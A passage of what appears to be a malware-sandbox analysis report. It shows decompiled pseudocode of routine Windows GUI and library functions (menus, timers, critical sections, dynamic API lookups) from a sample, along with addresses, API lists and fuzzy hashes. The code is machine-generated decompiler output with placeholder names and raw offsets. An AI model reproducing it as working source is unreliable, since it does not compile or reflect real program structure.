				intOrPtr* _t17;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr* _t44;
				intOrPtr* _t47;
				char _t53;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				void* _t69;
				void* _t73;

				_t73 = __fp0;
				_t65 = __edi;
				_t53 = __edx;
				if(__edx != 0) {
					_t69 = _t69 + 0xfffffff0;
					_t17 = E00403F68(_t17, _t68);
				}
				_v5 = _t53;
				_t47 = _t17;
				E004361F8(0, _t65, _t73);
				 *(_t47 + 0x50) =  *(_t47 + 0x50) |  *0x4730c0;
				 *((intOrPtr*)(_t47 + 0x234)) = E0047191C(_t47, 1, 0);
				 *((intOrPtr*)(_t47 + 0x238)) = E0047191C(_t47, 1, 1);
				 *((intOrPtr*)(_t47 + 0x23c)) = E00471F18(_t47, 1);
				_t66 = E00403BC0(1);
				 *((intOrPtr*)(_t47 + 0x248)) = _t66;
				 *((intOrPtr*)(_t66 + 0x10)) = _t47;
				E0044B38C(_t47, 1);
				E004440E4(_t47, 0xb9);
				E00444108(_t47, 0x59);
				 *((intOrPtr*)( *_t47 + 0x5c))();
				 *((char*)(_t47 + 0x1f8)) = 0;
				 *((char*)(_t47 + 0x258)) = 1;
				_t39 = E00473660(_t47, 1);
				_push(0);
				L00407658();
				_t67 = _t39;
				_push(0x5a);
				_push(_t67);
				L00407348();
				 *((intOrPtr*)(_t47 + 0x244)) = _t39;
				_t40 =  *0x46aea8; // 0x46aef4
				 *((intOrPtr*)(_t47 + 0x25c)) = _t40;
				_push(_t67);
				_push(0);
				L004078C0();
				 *((char*)(_t47 + 0x240)) =  *((intOrPtr*)(_t47 + 0x224));
				E00445AE8(_t47, 0, 0xb03d, 0);
				_t44 = _t47;
				if(_v5 != 0) {
					E00403FC0(_t44);
					_pop( *[fs:0x0]);
				}
				return _t47;
			}


















      0x00472f98
      0x00472f98
      0x00472f98
      0x00472fa0
      0x00472fa2
      0x00472fa5
      0x00472fa5
      0x00472faa
      0x00472fad
      0x00472fb3
      0x00472fc1
      0x00472fd4
      0x00472fea
      0x00472ffe
      0x00473010
      0x00473012
      0x00473018
      0x0047301f
      0x0047302b
      0x00473037
      0x00473042
      0x00473045
      0x0047304c
      0x00473057
      0x0047305c
      0x0047305e
      0x00473063
      0x00473065
      0x00473067
      0x00473068
      0x0047306d
      0x00473073
      0x00473078
      0x0047307e
      0x0047307f
      0x00473081
      0x0047308c
      0x0047309d
      0x004730a2
      0x004730a8
      0x004730aa
      0x004730af
      0x004730b6
      0x004730bf

      APIs
      • 73BEAC50.USER32(00000000), ref: 0047305E
      • 73BEAD70.GDI32(00000000,0000005A,00000000), ref: 00473068
      • 73BEB380.USER32(00000000,00000000,00000000,0000005A,00000000), ref: 00473081
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380
      • String ID: |#G
      • API String ID: 120756276-4105956212
      • Opcode ID: f38f537c9392e8b4d041168e58ff5e02b4bbf6c6342e6286e3fb149a5967cd5f
      • Instruction ID: 46cc195291b09597a959c5a12c64461a9f5205a36dc9f345357bb0829e7548bb
      • Opcode Fuzzy Hash: f38f537c9392e8b4d041168e58ff5e02b4bbf6c6342e6286e3fb149a5967cd5f
      • Instruction Fuzzy Hash: 7A318F307046419FE700AF3E9CC67993BA1AB05308F04417EFC0C9F397DA7AA9489B5A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042B308 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
      Download Yara Rule
      C-Code - Quality: 59%
      			E0042B308(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403BC0(1);
				_push(_t77);
				_push(0x42b38f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x417d18; // 0x417d64
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403DAC(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x4908ac);
				L00406FE8();
				_push(_t77);
				_push(0x42b3ef);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00429E74( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00429E70(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x42b3f6);
				_push(0x4908ac);
				L00407188();
				return 0;
			}












      0x0042b309
      0x0042b30b
      0x0042b315
      0x0042b324
      0x0042b329
      0x0042b32a
      0x0042b32f
      0x0042b332
      0x0042b338
      0x0042b33e
      0x0042b351
      0x0042b351
      0x0042b359
      0x0042b363
      0x0042b36e
      0x0042b36e
      0x0042b374
      0x0042b382
      0x0042b387
      0x0042b38a
      0x0042b3a6
      0x0042b3ab
      0x0042b3b2
      0x0042b3b3
      0x0042b3b8
      0x0042b3bb
      0x0042b3c4
      0x0042b3cf
      0x0042b3d2
      0x0042b3d9
      0x0042b3dc
      0x0042b3df
      0x0042b3e4
      0x0042b3e9
      0x0042b3ee

      APIs
      • RtlEnterCriticalSection.KERNEL32(004908AC), ref: 0042B3AB
      • RtlLeaveCriticalSection.KERNEL32(004908AC,0042B3F6,004908AC), ref: 0042B3E9
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$EnterLeave
      • String ID: HKB$d}A
      • API String ID: 3168844106-1457535182
      • Opcode ID: 1f38f0d75cafb898dcba265b0d05fc521e582eb6826c197028024ce9c301976f
      • Instruction ID: 36fd7c0ab21802537125e5207975b2eb6918c76cfe41e103440dfda8f4c2234e
      • Opcode Fuzzy Hash: 1f38f0d75cafb898dcba265b0d05fc521e582eb6826c197028024ce9c301976f
      • Instruction Fuzzy Hash: 13217C75B04308EFC701DF69D881989BBF5FF49720B6181A6E844A77A1D774EE80CA98
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0045801C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
      Download Yara Rule
      C-Code - Quality: 93%
      			E0045801C(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x48f9e0; // 0x490740
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E004583D0(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E004583D0(_t29) & 0x0000007f) << 0x0000000d) + ((E004583D0(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









      0x0045801e
      0x00458021
      0x00458023
      0x0045802c
      0x00458043
      0x00458045
      0x0045804c
      0x00458058
      0x0045805c
      0x0045806a
      0x00458071
      0x00458075
      0x00458087
      0x0045808c
      0x004580aa
      0x004580ae
      0x004580bc
      0x004580c3
      0x00000000
      0x004580c9
      0x004580c3
      0x0045808c
      0x00458071
      0x004580d6

      APIs
      • GetMenuItemInfoA.USER32 ref: 0045806A
      • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 004580BC
      • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 004580C9
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$InfoItem$Draw
      • String ID: P
      • API String ID: 3227129158-3110715001
      • Opcode ID: 1f8921f937ca2d31d1c93dbf41a94e3bb5feaa5468b06d2109982b46cd960e4f
      • Instruction ID: 8ef5379e858853adbb00536767b5f0ece2596a22c612a2d3fa24e7475ca92aa5
      • Opcode Fuzzy Hash: 1f8921f937ca2d31d1c93dbf41a94e3bb5feaa5468b06d2109982b46cd960e4f
      • Instruction Fuzzy Hash: A411B2706062006FD3209F28CC81B4B76D5AB84765F148A6DF494D73E6DBB9D848C74A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0043B020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47timeCOMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E0043B020(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				intOrPtr _t18;
				void* _t23;
				void* _t24;
				intOrPtr _t28;
				int _t32;
				intOrPtr _t35;

				_t24 = __ecx;
				_push(0);
				_t23 = __eax;
				_push(_t35);
				_push(0x43b09f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				KillTimer( *(__eax + 0x34), 1);
				_t32 =  *(_t23 + 0x30);
				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0 && SetTimer( *(_t23 + 0x34), 1, _t32, 0) == 0) {
					_t18 =  *0x48f9b4; // 0x423b38
					E00406A3C(_t18, _t24,  &_v8);
					E0040CBEC(_v8, 1);
					E004043D0();
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(0x43b0a6);
				return E00404A40( &_v8);
			}










      0x0043b020
      0x0043b023
      0x0043b027
      0x0043b02b
      0x0043b02c
      0x0043b031
      0x0043b034
      0x0043b03d
      0x0043b042
      0x0043b047
      0x0043b06b
      0x0043b070
      0x0043b07f
      0x0043b084
      0x0043b084
      0x0043b08b
      0x0043b08e
      0x0043b091
      0x0043b09e

      APIs
      • KillTimer.USER32(?,00000001,00000000,0043B09F,?,?,?,00000000), ref: 0043B03D
      • SetTimer.USER32(?,00000001,?,00000000), ref: 0043B05F
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Timer$KillLoadString
      • String ID: 8;B$TsA
      • API String ID: 1423459280-188886330
      • Opcode ID: 653e3072adaa866e9a41243bb1f2036cab4c303aa52ad2bf65e08713aa31443a
      • Instruction ID: fc89184edf4f2d8c5e1b779533e12bfff54074cc48cea77d7f6933711752c84d
      • Opcode Fuzzy Hash: 653e3072adaa866e9a41243bb1f2036cab4c303aa52ad2bf65e08713aa31443a
      • Instruction Fuzzy Hash: 5A01B531604300ABD715EF65CC82B5A37BCDB49708F402466FE00AB2C2D3B9AD40C698
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040E31C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0040E31C() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x48e134 = _t1;
				}
				if( *0x48e134 == 0) {
					 *0x48e134 = E004099C4;
					return E004099C4;
				}
				return _t1;
			}





      0x0040e322
      0x0040e327
      0x0040e32b
      0x0040e333
      0x0040e338
      0x0040e338
      0x0040e344
      0x0040e34b
      0x00000000
      0x0040e34b
      0x0040e351

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040EDE5,00000000,0040EDF8), ref: 0040E322
      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E333
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: GetDiskFreeSpaceExA$kernel32.dll
      • API String ID: 1646373207-3712701948
      • Opcode ID: 820f91be3b8516ba66e9ed471ca0a46da153e516522f4369c6fd71ba51a6564c
      • Instruction ID: 98c30d4ba901a7e1080fdc39561c8d2cb040fb54f4d3c54242f05c2c160db7a7
      • Opcode Fuzzy Hash: 820f91be3b8516ba66e9ed471ca0a46da153e516522f4369c6fd71ba51a6564c
      • Instruction Fuzzy Hash: 64D09EB1A063059AD700ABB79DD5B1A29549710304F145C3FE451773D1D6BD5864871E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042CF40 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0042CF40() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				if( *0x4908fc == 0) {
					_t1 = GetModuleHandleA("comctl32.dll");
					 *0x4908fc = _t1;
					if( *0x4908fc != 0) {
						_t2 =  *0x4908fc; // 0x0
						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
						 *0x490900 = _t3;
						return _t3;
					}
				}
				return _t1;
			}






      0x0042cf47
      0x0042cf4e
      0x0042cf53
      0x0042cf5f
      0x0042cf66
      0x0042cf6c
      0x0042cf71
      0x00000000
      0x0042cf71
      0x0042cf5f
      0x0042cf76

      APIs
      • GetModuleHandleA.KERNEL32(comctl32.dll,0042CFB1,00000200,0046ECBE), ref: 0042CF4E
      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0042CF6C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: InitCommonControlsEx$comctl32.dll
      • API String ID: 1646373207-802336580
      • Opcode ID: 69c23fe39cfbf1b6f93598a79715fcf1f3c75653fdb2a587359c7aa0f653e107
      • Instruction ID: 1c0b5fde6f092bdb74da236ea341a7adebd99d50b4511986d6cc84d4ca1c0675
      • Opcode Fuzzy Hash: 69c23fe39cfbf1b6f93598a79715fcf1f3c75653fdb2a587359c7aa0f653e107
      • Instruction Fuzzy Hash: 9CD01770BC43118EC210EB31BA49B0932A1A721304F8181BBA100621E0C37825088FCC
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00442838 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
      Download Yara Rule
      C-Code - Quality: 92%
      			E00442838(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x490b18 != 0) {
					L3:
					_t49 =  *0x490af8; // 0x0
					_t117 = E00442704(_t155,  &_v28, _t49);
					if( *0x490b18 == 0) {
						_t168 =  *0x490b1c;
						if( *0x490b1c != 0) {
							_t106 =  *0x490b0c; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x490b1c; // 0x0
							E0044CC7C(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x490af8; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x490b18;
						_t6 =  &_v24;
						 *_t6 =  *0x490b18 != 0;
						__eflags =  *_t6;
						 *0x490b18 = 2;
					} else {
						 *0x490b18 = 1;
						_v24 = 0;
					}
					_t54 =  *0x490afc; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x490afc; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x490afc; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x490afc; // 0x0
							E0044446C( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x490afc; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E0044275C(2);
						_t121 =  *_t155;
						_t60 =  *0x490afc; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x490b1c != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x490b1c; // 0x0
								E0044CC38(_t82, _t158);
								_t84 =  *0x490b1c; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x490b1c; // 0x0
									E0044CD64(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x490b1c; // 0x0
									E0044CC7C(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x490b1c; // 0x0
								E0044CDD8(_t91, _t131, __eflags);
								_t93 =  *0x48f9b8; // 0x490b80
								SetCursor(E00462578( *_t93, _t121, _t158));
							}
						}
						_t62 =  *0x48f9b8; // 0x490b80
						_t65 = SetCursor(E00462578( *_t62, _t121, _t158));
						if( *0x490b18 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00442798();
								_t67 =  *0x490afc; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0044446C(_t118,  &_v24, _t155);
									_t65 = E00403DF8(_t118, __eflags);
									_t135 =  *0x490afc; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x490afc; // 0x0
									_t65 = E00403DF8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x490afc; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x490afc; // 0x0
								_t65 = E00403DF8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x490afc == 0) {
								goto L32;
							} else {
								_t119 =  *0x490afc; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408D74(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x490afc; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x490afc; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x490afc; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E0044275C(1);
					if( *0x490afc == 0) {
						goto L32;
					}
					_t102 =  *0x490afc; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x490afc; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x490afc; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E0044275C(0);
					if( *0x490afc == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x490b08; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x490b14; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x490b0c; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x490b14; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}
















































      0x0044283e
      0x00442847
      0x00442876
      0x00442876
      0x00442892
      0x0044289b
      0x0044289d
      0x004428a4
      0x004428a6
      0x004428ac
      0x004428b9
      0x004428be
      0x004428be
      0x004428a4
      0x004428c3
      0x004428cf
      0x004428df
      0x004428e6
      0x004428e6
      0x004428e6
      0x004428eb
      0x004428d1
      0x004428d1
      0x004428d8
      0x004428d8
      0x004428f2
      0x004428fa
      0x00442947
      0x00442947
      0x0044294e
      0x00442954
      0x00442957
      0x00442960
      0x00442968
      0x00442970
      0x00442975
      0x0044297e
      0x00442985
      0x00442985
      0x00442993
      0x00442995
      0x00442997
      0x004429a1
      0x004429aa
      0x004429ae
      0x004429b8
      0x004429bd
      0x004429c2
      0x004429c7
      0x004429cb
      0x004429e6
      0x004429eb
      0x004429f0
      0x004429cd
      0x004429d1
      0x004429d8
      0x004429da
      0x004429df
      0x004429df
      0x004429f7
      0x004429f7
      0x004429fc
      0x00442a04
      0x00442a11
      0x00442a11
      0x004429ae
      0x00442a19
      0x00442a26
      0x00442a32
      0x00442b05
      0x00442b05
      0x00442a38
      0x00442a38
      0x00442a3a
      0x00442a5b
      0x00442a5d
      0x00442a62
      0x00442a65
      0x00442a67
      0x00442a95
      0x00442aa4
      0x00442aa9
      0x00442aaf
      0x00442a69
